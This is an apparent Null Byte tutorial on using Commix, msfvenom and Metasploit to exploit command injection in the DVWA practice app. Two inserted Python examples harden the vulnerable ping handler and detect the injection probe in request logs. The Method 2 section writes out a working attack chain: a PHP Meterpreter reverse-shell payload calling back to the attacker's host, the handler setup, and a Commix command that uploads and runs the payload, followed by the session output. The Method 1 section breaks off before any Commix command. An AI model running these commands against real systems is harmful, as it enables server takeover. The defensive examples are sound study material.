
Using Commix to Automate Command Injection Exploitation in Web Applications (Null Byte :: WonderHowTo)



The ability to execute system commands through a vulnerable web application makes command injection a fertile attack vector for any hacker. Although these vulnerabilities are highly prized, searching an entire application for them can take a long time. Fortunately, there is a useful tool called Commix that can automate this process for us.

What Is Commix?

Commix, a portmanteau of "command injection exploiter", is an open-source tool used to test web applications for command injection vulnerabilities. It is automated, which makes it very easy to identify vulnerable parameters in a fraction of the time a manual test would take.

Commix is written in Python, which means it can run on Linux, Mac, and Windows. It is also included in the official repositories of Kali Linux, BlackArch, and Parrot Security OS. It works out of the box, and there is even support for custom module development to extend the tool's core functionality.

A variety of options are available, including the ability to specify connection parameters to the host, target enumeration, file access and modification, and even an offline mode. All of these features make Commix a very useful tool when trying to exploit command injection.

In this tutorial, we will use Commix, and later msfvenom and Metasploit, to exploit command injection flaws in DVWA (Damn Vulnerable Web Application).

Method 1: Basic Usage

First open DVWA and sign in with the default credentials.

Next, navigate to DVWA Security and set the security level to low so that exploiting this web application goes smoothly.

Now go to the Command Execution tab; this is the page we will point Commix at.

For the tool to run successfully you need the cookie that contains the session ID and the security level. Use the Inspect Element tool in your browser to display the request: click "Network" and then "Raw headers" to view this information.
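The Command Execution page takes the ip parameter and hands it to ping through a shell, which is exactly the flaw Commix probes for. The following Python is an added example, not DVWA's or Commix's code: it rewrites that handler shape in Python, the string-concatenation version beside a hardened version that accepts only a literal IP address and calls ping with an argument list and no shell. COMMIX_PROBE is constructed from the probe string Commix prints later in this tutorial; vulnerable_command_line, hardened_argv and run_ping are hypothetical names chosen here.

```python
import ipaddress
import subprocess

# Constructed sample input (not captured traffic): the value Commix sends in
# the ip field when it tests for results-based command injection.
COMMIX_PROBE = "127.0.0.1;echo YJOSPV$((42+12))$(echo YJOSPV)YJOSPV"


def vulnerable_command_line(ip: str) -> str:
    """The unsafe pattern: user input concatenated into a shell command line.
    Returned instead of executed so it can be inspected safely; handed to a
    shell, everything after ';' runs and $((42+12)) / $(echo ...) are
    evaluated, which is how Commix confirms injection."""
    return "ping -c 1 " + ip


def hardened_argv(ip: str) -> list:
    """Validate first, then build an argument list for a shell-free call.
    ipaddress.ip_address() accepts only a literal IPv4/IPv6 address, so
    ';', '|', '`', '$(' and friends raise ValueError before anything runs."""
    address = ipaddress.ip_address(ip.strip())
    return ["ping", "-c", "1", str(address)]


def run_ping(ip: str, runner=subprocess.run) -> str:
    """Hardened handler body: a validation failure becomes a client error,
    never a shell. `runner` is injectable so the function can be exercised
    without a real ping binary."""
    try:
        argv = hardened_argv(ip)
    except ValueError:
        return "400 Bad Request: ip must be a literal IP address"
    result = runner(argv, shell=False, capture_output=True, text=True, timeout=10)
    return result.stdout


if __name__ == "__main__":
    print(vulnerable_command_line(COMMIX_PROBE))   # what the shell would see
    print(run_ping(COMMIX_PROBE))                   # rejected before execution
    print(hardened_argv("127.0.0.1"))               # the only shape that runs
```

The point of the hardened version is that validation and argument lists are independent defences: even if a looser validator let a stray character through, shell=False means there is no interpreter to give it meaning.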

Method 2: Upload Reverse Shell

Commix has a feature that lets us write files to the target system. We will put a reverse shell on the target that calls back to our attacking machine, but before we do that, we have to build the payload.

Msfvenom is a payload generator that replaced both msfpayload and msfencode back in 2015. This single tool can be used to create payloads outside the Metasploit framework.

Use the msfvenom command with the following options:

  • The -p flag to specify the payload.
  • lhost to specify the address of the listening host.
  • lport to set the listening port.
  • The -e flag to specify the encoder.
  • The -f flag to specify the output format.

Make sure to use > to redirect the output into a file, payload.php.

    root@drd:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.1.100 lport=4321 -e php/base64 -f raw > payload.php
    [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    [-] No arch selected, selecting arch: php from the payload
    Found 1 compatible encoders
    Attempting to encode payload with 1 iterations of php/base64
    php/base64 succeeded with size 1507 (iteration=0)
    php/base64 chosen with final size 1507
    Payload size: 1507 bytes

The payload was created successfully. Now all we have to do is put the PHP tags in our file. Type nano payload.php, add <?php at the beginning of the file and ?> at the end, then press Ctrl-X, Y, and Enter to save.

Now we have to open a handler on our machine to catch the session that will be opened from the target. Start Metasploit in a new terminal window by typing msfconsole. Once it loads, type use exploit/multi/handler to load the general-purpose handler.

Next, set the payload, listening address, and port that we specified earlier in our file.

    msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set lhost 172.16.1.100
    lhost => 172.16.1.100
    msf exploit(multi/handler) > set lport 4321
    lport => 4321

Once these are set, start the handler by typing run, an alias of exploit.

    msf exploit(multi/handler) > run

    [*] Started reverse TCP handler on 172.16.1.100:4321

Back in our other terminal, we can pass some additional options to Commix to get our payload onto the target:

  • The --file-write option to specify the file to use from our local machine.
  • The --file-dest option to set the destination path on the target.
  • The --os-cmd option to specify the command to execute once the file has been written to the destination.

    commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit' --file-write='/root/payload.php' --file-dest='/var/www/payload.php' --os-cmd='php -f /var/www/payload.php'

This executes our payload and, if everything works properly, opens a session on our handler. Commix will run for a while, and eventually we can see that our file was created successfully on the target.

    ...

    [*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
    [+] The POST parameter 'ip' seems injectable via (results-based) classic command injection technique.
    [~] Payload: echo YJOSPV$((42+12))$(echo YJOSPV)YJOSPV
    [+] The file '/var/www/payload.php' was created successfully!
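From the defender's side, the payload line above is the signature worth alerting on: a random token, a piece of shell arithmetic, and the same token echoed back through a subshell, all stuffed into a field that should only ever hold an IP address. The following Python is an added example, not part of the original post or of Commix: it scans constructed POST bodies for the exec page (an application log or WAF audit log would carry these; the plain Apache access log does not record request bodies) and flags both the Commix probe and generic shell metacharacters. SAMPLE_REQUESTS, classify and scan are names chosen here, and the sample records are constructed, not captured.

```python
import re
from urllib.parse import parse_qs

# Constructed records (not real traffic): (source IP, path, raw POST body)
# as an application or WAF audit log might store them for the DVWA exec page.
SAMPLE_REQUESTS = [
    ("172.16.1.50", "/dvwa/vulnerabilities/exec/", "ip=127.0.0.1&submit=submit"),
    ("172.16.1.100", "/dvwa/vulnerabilities/exec/",
     "ip=127.0.0.1%3Becho+YJOSPV%24%28%2842%2B12%29%29%24%28echo+YJOSPV%29YJOSPV&submit=submit"),
    ("172.16.1.100", "/dvwa/vulnerabilities/exec/",
     "ip=127.0.0.1%3Bphp+-f+%2Fvar%2Fwww%2Fpayload.php&submit=submit"),
    ("172.16.1.51", "/dvwa/vulnerabilities/exec/", "ip=10.0.0.1&submit=submit"),
]

# Commix's results-based probe: "echo TOKEN$((a+b))$(echo TOKEN)TOKEN".
# The back-references require the same token in all three places, which keeps
# ordinary text containing the word "echo" from matching.
COMMIX_ECHO_PROBE = re.compile(
    r"echo\s+(\w+)\$\(\(\d+\s*\+\s*\d+\)\)\$\(echo\s+\1\)\1"
)

# Generic shell metacharacters that have no business in an IP-address field.
SHELL_META = re.compile(r"[;|`&]|\$\(|\$\{")


def classify(body: str, param: str = "ip") -> str:
    """Return 'commix-probe', 'shell-metachar' or 'clean' for one POST body.

    parse_qs percent-decodes and turns '+' into spaces, so matching happens
    on the value the application itself would have seen."""
    for value in parse_qs(body).get(param, []):
        if COMMIX_ECHO_PROBE.search(value):
            return "commix-probe"
        if SHELL_META.search(value):
            return "shell-metachar"
    return "clean"


def scan(records) -> list:
    """Return (source_ip, verdict, decoded_value) for every non-clean record."""
    findings = []
    for source, _path, body in records:
        verdict = classify(body)
        if verdict != "clean":
            findings.append((source, verdict, parse_qs(body)["ip"][0]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Two hits from the same source in quick succession, first the probe and then a follow-up command, is the sequence this tutorial produces; correlating on source address is what turns two isolated matches into one incident.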

Now, in the other terminal, you can see that a Meterpreter session has indeed been opened. We can run commands such as getuid and sysinfo to display information about the target.

    [*] Sending stage (37775 bytes) to 172.16.1.102
    [*] Meterpreter session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500

    meterpreter > getuid
    Server username: www-data (33)
    meterpreter > sysinfo
    Computer    : metasploitable
    OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    Meterpreter : php/linux

These are similar results to what we got using Commix alone, but now that we have a Meterpreter session, we have much more flexibility in what we can ultimately do.

Conclusion

Hackers go after command injection vulnerabilities because of the power they give over the target system. Commix is a very useful tool that automates the process of finding and exploiting these vulnerabilities, making life a little easier for the hacker.

In this guide, we learned some basic usage options. We also saw how to combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent addition to any hacker's arsenal.


Cover image by Jarmoluk/Pixabay; screenshots by drd_/Null Byte
